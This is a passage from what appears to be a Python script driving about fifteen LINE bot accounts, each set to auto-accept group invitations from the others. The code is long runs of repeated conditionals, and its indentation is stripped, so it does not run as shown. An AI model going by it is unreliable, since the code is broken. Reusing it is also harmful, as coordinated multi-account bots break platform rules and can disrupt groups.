k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Vmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Wmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Xmid:
k1.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Fmid:
if op.param2 in mid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Amid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Bmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Cmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Dmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Emid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Gmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Hmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Imid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Jmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Kmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Lmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Mmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Nmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Omid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Pmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Qmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Rmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Smid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Tmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Umid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Vmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Wmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Xmid:
k2.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Gmid:
if op.param2 in mid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Amid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Bmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Cmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Dmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Emid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Fmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Hmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Imid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Jmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Kmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Lmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Mmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Nmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Omid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Pmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Qmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Rmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Smid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Tmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Umid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Vmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Wmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Xmid:
k3.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Hmid:
if op.param2 in mid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Amid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Bmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Cmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Dmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Emid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Fmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Gmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Imid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Jmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Kmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Lmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Mmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Nmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Omid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Pmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Qmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Rmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Smid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Tmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Umid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Vmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Wmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Xmid:
k4.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Imid:
if op.param2 in mid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Amid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Bmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Cmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Dmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Emid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Fmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Gmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Hmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Jmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Kmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Lmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Mmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Nmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Omid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Pmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Qmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Rmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Smid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Tmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Umid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Vmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Wmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Xmid:
k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Jmid:
if op.param2 in mid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Amid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Bmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Cmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Dmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Emid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Fmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Gmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Hmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Imid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Kmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Lmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Mmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Nmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Omid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Pmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Qmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Rmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Smid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Tmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Umid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Vmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Wmid:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Xmid:
k6.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Kmid:
if op.param2 in mid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Amid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Bmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Cmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Dmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Emid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Fmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Gmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Hmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Imid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Jmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Lmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Mmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Nmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Omid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Pmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Qmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Rmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Smid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Tmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Umid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Vmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Wmid:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Xmid:
k7.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Lmid:
if op.param2 in mid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Amid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Bmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Cmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Dmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Emid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Fmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Gmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Hmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Imid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Jmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Kmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Mmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Nmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Omid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Pmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Qmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Rmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Smid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Tmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Umid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Vmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Wmid:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Xmid:
k8.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Mmid:
if op.param2 in mid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Amid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Bmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Cmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Dmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Emid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Fmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Gmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Hmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Imid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Jmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Kmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Lmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Nmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Omid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Pmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Qmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Rmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Smid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Tmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Umid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Vmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Wmid:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Xmid:
k9.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Nmid:
if op.param2 in mid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Amid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Bmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Cmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Dmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Emid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Fmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Gmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Hmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Imid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Jmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Kmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Lmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Mmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Omid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Pmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Qmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Rmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Smid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Tmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Umid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Vmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Wmid:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Xmid:
k10.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Omid:
if op.param2 in mid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Amid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Bmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Cmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Dmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Emid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Fmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Gmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Hmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Imid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Jmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Kmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Lmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Mmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Nmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Pmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Qmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Rmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Smid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Tmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Umid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Vmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Wmid:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Xmid:
k11.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Pmid:
if op.param2 in mid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Amid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Bmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Cmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Dmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Emid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Fmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Gmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Hmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Imid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Jmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Kmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Lmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Mmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Nmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Omid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Qmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Rmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Smid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Tmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Umid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Vmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Wmid:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Xmid:
k12.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Qmid:
if op.param2 in mid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Amid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Bmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Cmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Dmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Emid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Fmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Gmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Hmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Imid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Jmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Kmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Lmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Mmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Nmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Omid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Pmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Rmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Smid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Tmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Umid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Vmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Wmid:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Xmid:
k13.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Rmid:
if op.param2 in mid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Amid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Bmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Cmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Dmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Emid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Fmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Gmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Hmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Imid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Jmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Kmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Lmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Mmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Nmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Omid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Pmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Qmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Smid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Tmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Umid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Vmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Wmid:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Xmid:
k14.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Smid:
if op.param2 in mid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Amid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Bmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Cmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Dmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Emid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Fmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Gmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Hmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Imid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Jmid:
